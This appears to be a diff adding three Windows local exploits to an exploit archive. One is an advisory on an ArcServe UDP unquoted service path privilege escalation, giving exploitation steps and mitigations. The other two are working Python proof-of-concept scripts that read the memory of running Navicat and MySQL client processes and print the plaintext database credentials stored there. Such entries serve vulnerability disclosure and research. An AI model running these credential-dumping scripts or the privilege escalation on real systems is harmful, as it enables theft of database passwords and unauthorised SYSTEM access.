||||
|
||||
}
|
||||
72
platforms/windows/local/40335.txt
Executable file
72
platforms/windows/local/40335.txt
Executable file
|
|
@ -0,0 +1,72 @@
|
|||
Title: ArcServe UDP - Unquoted Service Path Privilege Escalation
|
||||
CWE Class: CWE-427: Uncontrolled Search Path Element
|
||||
Date: 04/09/2016
|
||||
Vendor: ArcServe
|
||||
Product: ArcServe UDP Standard Edition for Windows, TRIAL
|
||||
Type: Backup Software
|
||||
Version: 6.0.3792 Update 2 Build 516
|
||||
Download URL: http://arcserve.com/free-backup-software-trial/
|
||||
Tested on: Windows 7x86 EN
|
||||
Release Mode: coordinated release
|
||||
|
||||
|
||||
- 1. Product Description: -
|
||||
A comprehensive solution that empowers even a one-person IT department to protect virtual and physical environments with a high degree of simplicity:
|
||||
Design and manage your entire data protection strategy with a unified management console
|
||||
Scale your data backup coverage as your organization grows with the push of a button
|
||||
|
||||
- 2. Vulnerability Details: -
|
||||
ArcServe UDP for Windows installs various services.
|
||||
One of them is the "Arcserve UDP Update Service (CAARCUpdateSvc)" running as SYSTEM.
|
||||
This particular service has an insecurely quoted path.
|
||||
Other services where correctly quoted.
|
||||
An attacker with write permissions on the root-drive or directory in the search path
|
||||
could place a malicious binary and elevate privileges.
|
||||
|
||||
- 3. PoC Details: -
|
||||
There are various ways to audit for this type of vulnerability.
|
||||
This proof-of-concept demonstrates both an automated and manual way.
|
||||
|
||||
Step 1: Identify the issue
|
||||
Automatic: use the windows-privesc-check toolkit to audit the local system.
|
||||
Manual: run 'sc qc CAARCUpdateSvc' and confirm it has an unquoted service path.
|
||||
|
||||
Output: C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe
|
||||
This should be: "C:\Program Files\Arcserve\Unified Data Protection\Update Manager\ARCUpdate.exe"
|
||||
|
||||
Step 2: Assess if exploitation is possible
|
||||
To exploit this issue assess the permissions of each folder in the path using space as a token.
|
||||
|
||||
If any of the directories is writable for a non-administrative user, try to exploit the issue.
|
||||
|
||||
Step 3 Exploitation:
|
||||
Place a binary with the correct name in the vulnerable directory.
|
||||
Reboot the system and validate your payload is executed with SYSTEM privileges
|
||||
|
||||
- 4. Vendor Mitigation: -
|
||||
Create an update for the product which add quotes to the path.
|
||||
|
||||
While the update is being developed customers could apply a manual fix:
|
||||
Open regedit, browse to HKLM\SYSTEM\CurrentControlSet\services
|
||||
Add quotes to the ImagePath value of the relevant service.
|
||||
|
||||
- 5. End-user Mitigation: -
|
||||
A patch has been released by Arcserve.
|
||||
All customer should upgrade to the latest version as described in the release notes:
|
||||
http://documentation.arcserve.com/Arcserve-UDP/Available/V6/ENU/Bookshelf_Files/HTML/Update3/Default.htm#Update3/upd3_Issues_Fixed.htm%3FTocPath%3D_____6
|
||||
|
||||
- 6. Author: -
|
||||
sh4d0wman / Herman Groeneveld
|
||||
herman_worldwide AT hotmail. com
|
||||
|
||||
- 7. Timeline: -
|
||||
* 01/06/2016: Vulnerability discovery
|
||||
* 18/06/2016: Request sent to info@arcserve.com for a security point-of-contact
|
||||
* 21/06/2016: Received contact but no secure channel. Requested confirmation to send PoC over unsecure channel
|
||||
* 22/06/2016: vendor supplied PGP key, vulnerability PoC sent
|
||||
* 09/07/2016: Received information: 2 out of 3 issues have fixes pending.
|
||||
Vendor requests additional mitigation techniques for the third issue.
|
||||
* 13/07/2016: Sent vendor various mitigation solutions and their limitations.
|
||||
* 13/08/2016: Vendor informs release is pending for all discovered issues.
|
||||
* 15/08/2016: Vendor requests text for release bulletin.
|
||||
* 19/08/2016: A fix has been released.
|
||||
70
platforms/windows/local/40336.py
Executable file
70
platforms/windows/local/40336.py
Executable file
|
|
@ -0,0 +1,70 @@
|
|||
#####
|
||||
# Navicat Premium 11.2.11 (64bit) Local Password Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://www.navicat.com/
|
||||
# Date 05/09/2016
|
||||
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
#
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
|
||||
#####
|
||||
# Navicat Premium client v11.2.11 is vulnerable to local password disclosure, the supplied password is stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied password in order to gain access to the database.
|
||||
# Proof-Of-Concept Code:
|
||||
#####
|
||||
|
||||
import time
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
count = 0
|
||||
found = 0
|
||||
filename = "navicat.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
|
||||
def b2h(str):
|
||||
return ''.join(["%02X " % ord(x) for x in str]).strip()
|
||||
|
||||
def h2b(str):
|
||||
bytes = []
|
||||
str = ''.join(str.split(" "))
|
||||
for i in range(0, len(str), 2):
|
||||
bytes.append(chr(int(str[i:i+2], 16)))
|
||||
return ''.join(bytes)
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process with pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
|
||||
memory_dump.append(process.read(address,30))
|
||||
memory_dump.pop(0)
|
||||
for i in range(len(memory_dump)):
|
||||
str = b2h(memory_dump[i])
|
||||
first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
|
||||
last = first.split("00 ")
|
||||
if last[0]:
|
||||
count = count+1
|
||||
found = 1
|
||||
print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
|
||||
if found == 0:
|
||||
print "[-] Password not found! Make sure the client is connected at least to one database."
|
||||
else:
|
||||
print "[-] No process found with name '%s'." % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
93
platforms/windows/local/40337.py
Executable file
93
platforms/windows/local/40337.py
Executable file
|
|
@ -0,0 +1,93 @@
|
|||
#####
|
||||
# MySQL 5.5.45 (64bit) Local Credentials Disclosure
|
||||
# Tested on Windows Windows Server 2012 R2 64bit, English
|
||||
# Vendor Homepage @ https://www.mysql.com
|
||||
# Date 05/09/2016
|
||||
# Bug Discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
#
|
||||
# http://www.black-rose.ml
|
||||
#
|
||||
# Special Thanks & Greetings to friend of mine Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/)
|
||||
#####
|
||||
# MySQL v5.5.45 is vulnerable to local credentials disclosure, the supplied username and password are stored in a plaintext format in memory process.
|
||||
# A potential attacker could reveal the supplied username and password in order to gain access to the database.
|
||||
# Proof-Of-Concept Code:
|
||||
#####
|
||||
|
||||
import time
|
||||
from winappdbg import Debug, Process
|
||||
|
||||
def b2h(str):
|
||||
return ''.join(["%02X " % ord(x) for x in str]).strip()
|
||||
|
||||
def h2b(str):
|
||||
bytes = []
|
||||
str = ''.join(str.split(" "))
|
||||
|
||||
for i in range(0, len(str), 2):
|
||||
bytes.append(chr(int(str[i:i+2], 16)))
|
||||
|
||||
return ''.join(bytes)
|
||||
|
||||
usr = ''
|
||||
pwd = ''
|
||||
count = 0
|
||||
filename = "mysql.exe"
|
||||
process_pid = 0
|
||||
memory_dump = []
|
||||
passwd = []
|
||||
|
||||
debug = Debug()
|
||||
try:
|
||||
print "[~] Searching for pid by process name '%s'.." % (filename)
|
||||
time.sleep(1)
|
||||
debug.system.scan_processes()
|
||||
for (process, process_name) in debug.system.find_processes_by_filename(filename):
|
||||
process_pid = process.get_pid()
|
||||
if process_pid is not 0:
|
||||
print "[+] Found process pid #%d" % (process_pid)
|
||||
time.sleep(1)
|
||||
print "[~] Trying to read memory for pid #%d" % (process_pid)
|
||||
|
||||
process = Process(process_pid)
|
||||
for address in process.search_bytes('\x00\x6D\x79\x73\x71\x6C\x00\x2D\x75\x00'):
|
||||
memory_dump.append(process.read(address,30))
|
||||
for i in range(len(memory_dump)):
|
||||
str = b2h(memory_dump[i])
|
||||
first = str.split("00 6D 79 73 71 6C 00 2D 75 00 ")[1]
|
||||
last = first.split(" 00 2D 70")
|
||||
if last[0]:
|
||||
usr = h2b(last[0])
|
||||
|
||||
memory_dump = []
|
||||
for address in process.search_bytes('\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'):
|
||||
memory_dump.append(process.read(address,100))
|
||||
sorted(set(memory_dump))
|
||||
for i in range(len(memory_dump)):
|
||||
str = b2h(memory_dump[i])
|
||||
string = str.split('00 8F')
|
||||
for x in range(len(string)):
|
||||
if x == 1:
|
||||
passwd = string
|
||||
try:
|
||||
pwd = h2b(passwd[1].split('00 00')[0])
|
||||
except:
|
||||
pass
|
||||
|
||||
print "[~] Trying to extract credentials from memory.."
|
||||
time.sleep(1)
|
||||
if usr != '' and pwd != '':
|
||||
print "[+] Credentials found!\r\n----------------------------------------"
|
||||
print "[+] Username: %s" % usr
|
||||
print "[+] Password: %s" % pwd
|
||||
else:
|
||||
print "[-] Credentials not found!"
|
||||
else:
|
||||
print "[-] No process found with name '%s'" % (filename)
|
||||
|
||||
debug.loop()
|
||||
finally:
|
||||
debug.stop()
|
||||
|
||||
|
||||
|
||||
Loading…
Add table
Reference in a new issue